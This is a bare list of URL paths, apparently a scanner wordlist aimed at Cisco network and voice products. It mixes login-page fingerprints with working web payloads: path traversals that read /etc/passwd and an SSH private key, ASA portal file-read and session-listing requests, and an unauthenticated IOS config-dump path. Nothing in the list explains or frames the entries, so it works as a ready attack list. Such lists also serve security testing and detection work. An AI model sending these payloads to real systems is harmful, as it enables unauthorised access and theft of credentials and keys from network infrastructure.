/level/16/exec/show/config/CR
/dumpmdm.cmd
/+CSCOE+/session_password.html
/invoker/readonly
/adm/file.cgi?next_file=%2fetc%2fpasswd
/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/cgi-bin/config.exp
/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fviptela%2F.ssh%2Fid_dsa
/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
/index.vm
/CACHE/sdesktop/data.xml
/+CSCOE+/logon.html?fcadbadd=1
:8443/+CSCOE+/logon.html?fcadbadd=1
/+CSCOE+/logon.html
/auth/?next=%2F
/desktop/container/landing.jsp?locale=en_US
/login.html
/#connection
/CGI/Java/Serviceability?adapter=device.statistics.configuration
/#/logIn?redirectURL=%2F
/webacs/pages/common/login.jsp
/login
/CACHE/sdesktop/install/start.htm
/pages/sdcall/Login.jsp
/webvpn.html
/_syslog.txt
/cucm-uds/users
